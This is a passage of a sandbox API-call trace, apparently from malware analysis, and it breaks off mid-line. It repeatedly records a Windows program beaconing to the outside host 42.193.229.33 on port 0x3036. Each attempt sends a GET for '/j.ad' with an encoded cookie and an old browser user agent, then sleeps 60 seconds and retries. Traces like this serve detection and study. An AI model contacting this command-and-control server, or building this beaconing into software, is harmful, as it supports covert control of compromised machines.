[0192.990] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0192.990] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0192.990] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0192.990] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0192.990] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0192.990] Sleep (dwMilliseconds=0xea60) [0192.994] GetLastError () returned 0x2efd [0192.995] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0192.995] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0192.995] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0192.995] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0192.995] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0192.995] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0192.995] GetLastError () returned 0x0 [0192.995] htonl (hostlong=0x7000000) returned 0x7 [0192.995] htonl (hostlong=0x0) returned 0x0 [0192.995] htonl (hostlong=0x3000000) returned 0x3 [0192.995] htonl (hostlong=0x6000000) returned 0x6 [0192.995] htonl (hostlong=0x6000000) returned 0x6 [0192.995] GetLastError () returned 0x0 [0192.995] htonl (hostlong=0x0) returned 0x0 [0192.995] GetLastError () returned 0x0 [0192.995] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0192.996] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0195.000] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0195.000] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0195.000] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0195.000] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0195.000] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0195.000] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0195.000] Sleep (dwMilliseconds=0xea60) [0195.006] GetLastError () returned 0x2efd [0195.007] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0195.007] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0195.007] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0195.007] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0195.007] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0195.007] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0195.007] GetLastError () returned 0x0 [0195.007] htonl (hostlong=0x7000000) returned 0x7 [0195.007] htonl (hostlong=0x0) returned 0x0 [0195.007] htonl (hostlong=0x3000000) returned 0x3 [0195.007] htonl (hostlong=0x6000000) returned 0x6 [0195.007] htonl (hostlong=0x6000000) returned 0x6 [0195.007] GetLastError () returned 0x0 [0195.007] htonl (hostlong=0x0) returned 0x0 [0195.007] GetLastError () returned 0x0 [0195.007] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0195.008] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0197.019] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0197.019] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0197.019] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0197.021] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0197.022] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0197.022] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0197.023] Sleep (dwMilliseconds=0xea60) [0197.036] GetLastError () returned 0x2efd [0197.036] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0197.036] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0197.036] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0197.036] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0197.036] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0197.037] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0197.037] GetLastError () returned 0x0 [0197.038] htonl (hostlong=0x7000000) returned 0x7 [0197.038] htonl (hostlong=0x0) returned 0x0 [0197.039] htonl (hostlong=0x3000000) returned 0x3 [0197.039] htonl (hostlong=0x6000000) returned 0x6 [0197.039] htonl (hostlong=0x6000000) returned 0x6 [0197.039] GetLastError () returned 0x0 [0197.040] htonl (hostlong=0x0) returned 0x0 [0197.040] GetLastError () returned 0x0 [0197.040] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0197.041] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0199.111] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0199.111] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0199.111] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0199.111] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0199.111] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0199.112] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0199.112] Sleep (dwMilliseconds=0xea60) [0199.125] GetLastError () returned 0x2efd [0199.129] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0199.129] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0199.129] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0199.129] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0199.129] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0199.130] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0199.130] GetLastError () returned 0x0 [0199.130] htonl (hostlong=0x7000000) returned 0x7 [0199.130] htonl (hostlong=0x0) returned 0x0 [0199.130] htonl (hostlong=0x3000000) returned 0x3 [0199.130] htonl (hostlong=0x6000000) returned 0x6 [0199.130] htonl (hostlong=0x6000000) returned 0x6 [0199.130] GetLastError () returned 0x0 [0199.130] htonl (hostlong=0x0) returned 0x0 [0199.130] GetLastError () returned 0x0 [0199.130] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0199.130] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0201.113] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0201.113] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0201.113] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0201.113] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0201.113] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0201.113] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0201.114] Sleep (dwMilliseconds=0xea60) [0201.122] GetLastError () returned 0x2efd [0201.122] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0201.128] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0201.128] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0201.128] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0201.128] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0201.128] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0201.128] GetLastError () returned 0x0 [0201.129] htonl (hostlong=0x7000000) returned 0x7 [0201.129] htonl (hostlong=0x0) returned 0x0 [0201.129] htonl (hostlong=0x3000000) returned 0x3 [0201.129] htonl (hostlong=0x6000000) returned 0x6 [0201.129] htonl (hostlong=0x6000000) returned 0x6 [0201.129] GetLastError () returned 0x0 [0201.129] htonl (hostlong=0x0) returned 0x0 [0201.129] GetLastError () returned 0x0 [0201.129] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0201.129] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0203.134] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0203.135] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0203.135] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0203.135] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0203.135] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0203.135] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0203.135] Sleep (dwMilliseconds=0xea60) [0203.150] GetLastError () returned 0x2efd [0203.153] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0203.154] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0203.154] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0203.154] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0203.155] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0203.155] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0203.155] GetLastError () returned 0x0 [0203.155] htonl (hostlong=0x7000000) returned 0x7 [0203.155] htonl (hostlong=0x0) returned 0x0 [0203.155] htonl (hostlong=0x3000000) returned 0x3 [0203.155] htonl (hostlong=0x6000000) returned 0x6 [0203.155] htonl (hostlong=0x6000000) returned 0x6 [0203.155] GetLastError () returned 0x0 [0203.155] htonl (hostlong=0x0) returned 0x0 [0203.155] GetLastError () returned 0x0 [0203.155] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0203.155] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0205.139] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0205.139] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0205.139] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0205.139] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0205.139] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0205.140] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0205.140] Sleep (dwMilliseconds=0xea60) [0205.147] GetLastError () returned 0x2efd [0205.153] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0205.153] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0205.153] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0205.153] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0205.153] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0205.153] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0205.153] GetLastError () returned 0x0 [0205.153] htonl (hostlong=0x7000000) returned 0x7 [0205.153] htonl (hostlong=0x0) returned 0x0 [0205.153] htonl (hostlong=0x3000000) returned 0x3 [0205.153] htonl (hostlong=0x6000000) returned 0x6 [0205.153] htonl (hostlong=0x6000000) returned 0x6 [0205.153] GetLastError () returned 0x0 [0205.153] htonl (hostlong=0x0) returned 0x0 [0205.153] GetLastError () returned 0x0 [0205.154] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0205.154] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0207.143] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0207.143] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0207.143] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0207.143] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0207.143] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0207.143] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0207.143] Sleep (dwMilliseconds=0xea60) [0207.159] GetLastError () returned 0x2efd [0207.159] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0207.159] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0207.159] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0207.159] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0207.160] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0207.160] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0207.160] GetLastError () returned 0x0 [0207.160] htonl (hostlong=0x7000000) returned 0x7 [0207.160] htonl (hostlong=0x0) returned 0x0 [0207.160] htonl (hostlong=0x3000000) returned 0x3 [0207.160] htonl (hostlong=0x6000000) returned 0x6 [0207.160] htonl (hostlong=0x6000000) returned 0x6 [0207.160] GetLastError () returned 0x0 [0207.160] htonl (hostlong=0x0) returned 0x0 [0207.160] GetLastError () returned 0x0 [0207.160] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0207.160] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0209.140] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0209.140] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0209.140] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0209.140] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0209.141] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0209.141] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0209.141] Sleep (dwMilliseconds=0xea60) [0209.160] GetLastError () returned 0x2efd [0209.160] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0209.160] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0209.160] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0209.160] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0209.161] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0209.161] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0209.161] GetLastError () returned 0x0 [0209.161] htonl (hostlong=0x7000000) returned 0x7 [0209.161] htonl (hostlong=0x0) returned 0x0 [0209.161] htonl (hostlong=0x3000000) returned 0x3 [0209.161] htonl (hostlong=0x6000000) returned 0x6 [0209.161] htonl (hostlong=0x6000000) returned 0x6 [0209.161] GetLastError () returned 0x0 [0209.161] htonl (hostlong=0x0) returned 0x0 [0209.161] GetLastError () returned 0x0 [0209.161] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0209.161] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0211.161] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0211.161] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0211.161] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0211.161] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0211.162] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0211.162] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0211.162] Sleep (dwMilliseconds=0xea60) [0211.179] GetLastError () returned 0x2efd [0211.179] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0211.179] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0211.179] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0211.179] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0211.179] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0211.179] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0211.179] GetLastError () returned 0x0 [0211.179] htonl (hostlong=0x7000000) returned 0x7 [0211.179] htonl (hostlong=0x0) returned 0x0 [0211.179] htonl (hostlong=0x3000000) returned 0x3 [0211.179] htonl (hostlong=0x6000000) returned 0x6 [0211.179] htonl (hostlong=0x6000000) returned 0x6 [0211.179] GetLastError () returned 0x0 [0211.179] htonl (hostlong=0x0) returned 0x0 [0211.179] GetLastError () returned 0x0 [0211.180] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0211.180] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: 